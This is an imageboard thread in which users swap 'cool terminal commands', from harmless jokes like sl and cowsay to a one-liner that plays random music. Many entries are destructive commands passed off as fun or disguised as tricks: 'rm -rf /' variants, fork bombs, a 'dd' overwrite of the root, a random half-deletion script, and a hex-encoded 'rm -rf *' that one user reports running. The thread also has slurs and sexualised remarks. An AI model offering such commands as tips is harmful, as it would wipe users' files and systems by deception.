What are some cool terminal commands?

What are some cool terminal commands?

Attached: 1495396335477.jpg (624x576, 128K)

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$ sl

My daughter is so cute!



Attached: sexistmanpage.png (666x538, 35K)

I don't think busybox includes that

sudo rm -rf /

rm -rf --no-preserve-root /


sudo firewall-cmd --add-service=dns
instead of --add-port=53/udp (/tcp)
because everyone is using it wrong all the time
inb4 using systemd

`alias fuck='sudo $(history -p \!\!)'`


ha ha yep


ls -aR /

cat /*

What will the -p and the \!\! do?
I cannot find any info in my manpages about -p and also nowhere on google and duckduckgo

write an infinity gauntlet snap command that deletes half the files at random

help history

Thanks Kanye, very cool.

However I doubt that it'll do that, so I won't try.

I remember being 14 on this fucking site, like a decade ago, and saw a post that had some bash command base64 encoded. Shitton of people were claiming it made your PC speaker beep and made music. Ran it like a fucking idiot and half an hour realized when my browser wouldn't launch that that base64 encode was really a `sudo rm -rf ~`

Never again have I run a command from this stupid fucking website.

people actually spent time creating this.

>SJW bullshit

>sudo apt-get install cowsay
>cowsay moo
hehe funny (:

>I cannot find any info in my manpages about -p

man history

!! Refer to the previous command. This is a synonym for `!-1'.

p Print the new command but do not execute it.

AT&T from the 80's.

$ touch penis

Thank you Kanye, very cool

Attached: 1526280823064.jpg (613x640, 146K)

Why are you calling me Kanye? My name is Szymon

Szymon is a pretty cool guy and doesn't afraid of anything

Attached: 1527101405267.jpg (404x501, 59K)

git rebase -i

Idź spać Szymon.

while read -rd $'\0' f; do

done <

perl -e "fork while fork" &


Isn't sudo !! is enough in bash ?

I don't know why I never heard of it before yesterday.


sudo !! Works in the shell, but the !! does not expand in aliases, so you need to use fc or history.

this is a classic
cat /dev/urandom | hexdump -v -e '/1 "%u\n"' | awk '{ split("0,2,4,5,7,9,11,12",a,","); for (i = 0; i < 1; i+= 0.0001) printf("%08X\n", 100*sin(1382*exp((a[$1 % 8]/12)*log(2))*i)) }' | xxd -r -p | aplay -c 2 -f S32_LE -r 16000

Thie triggers my autism: UUOC, or, for plebian humans: useless use of cat.
You xan point hexdump to /dev/urandom directly!


Finally, some good fucking cunny

opened OPs image in tiv, which is a terminal image viewer hence the name, and this happened.

btw tiv can be found at github.com/stefanhaustein/TerminalImageViewer.git

Attached: Screenshot from 2018-06-21 01-23-57.png (762x364, 75K)

>opened OPs image in tiv, which is a terminal image viewer hence the name, and this happened.
>btw tiv can be found at github.com/stefanhaustein/TerminalImageViewer.git
Wow, one time it didn't segfault

Attached: wewuzzian.png (652x668, 130K)

Beautiful glitchy.

who is this coconut looking bitch

lul for real? do you have sauce?

Imagine being so desperate for attention you have to sell a bad reddit larp as your own story on an anonymous Taiwanese crab fishing forum

>he fell for the gnu meme

touch Akarin

sudo su -
dd if=/dev/null of=/

apt install thefuck links

It doesn't work like you think.

Attached: 1527892564131.jpg (1280x1440, 179K)

I don't have the source code since it was closed source AT&T. I do have the printed manual
It's part of the Document Writers Workbench (DWW)
Mainly where troff was developed.

No, the archive.org shit was a prank that somehow nobody has yet given a shit about.
If you look at any other version of the manual, the sexist part does not exist.

You're retarded, the sexist program is written about in Tim Oreilly's``Unix Text Processing'' from 1985.

Attached: myimage.png (840x824, 209K)

$ OP is a faggot

whatis $(compgen -c | grep jpeg)

su wizard
get dubs
mic --drop

su wizard
get --epic
mic --drop

OP for even asking such a question this is the command that you need to run:

shutdown /s

it will play the zelda theme


$ touch loli
touch: cannot touch 'loli': Permission denied

Some of the tools are a little too simplistic for my taste but nothing wrong with busybox

emerge dick --keep-going


>like a decade ago
OK, kid.

Maybe it's in one of these?

infinity_snap() {
find / -xdev -type f | tee a | wc -l | read
shuf -n $((REPLY/2)) a | xargs rm; rm a

It was only 2008, user.



linux emote easter egg
:(){ :|:& };:

and after some shell wizardry
alias isnap='(find / -xdev -type f 1>&4 | wc -l | read; shuf -n $((REPLY/2)) /dev/fd/4 | xargs rm) 4>$(mktemp -u)'

Linux is a kernel.

Linux is an operating system.

Attached: linusfinger.jpg (225x225, 12K)

is that a typehateana doujin?

cat /dev/port

That's awesome actually

$(echo 726d202d7266202a | xxd -r -p)

Holy crap, that's pretty cool.

touch cock

Holy shit you got me. Luckily I had the linux source in my home directory and killed it before it got out lmao.

i knew my dummy post would work

its mainly a windows command, starts to print out a picture in the terminal

Actually I miscalculated. The ONLY thing left in my home directory is the linux source since it is owned by root. I'm happy to say anything important is on my network share.

Only thing I kinda miss is the redshift hook I had.

yeah its a pretty good picture printer


Wait I forgot to unhide files. Any directory or file with a . before it was saved due to the massive amount of permissions denied from the linux source. So we actually gucci af

A command prompt can do that?!?!

try this, OP
:(){ :|: & };:


Woah! How come never has posted this before?

wait til you check this out gentooman: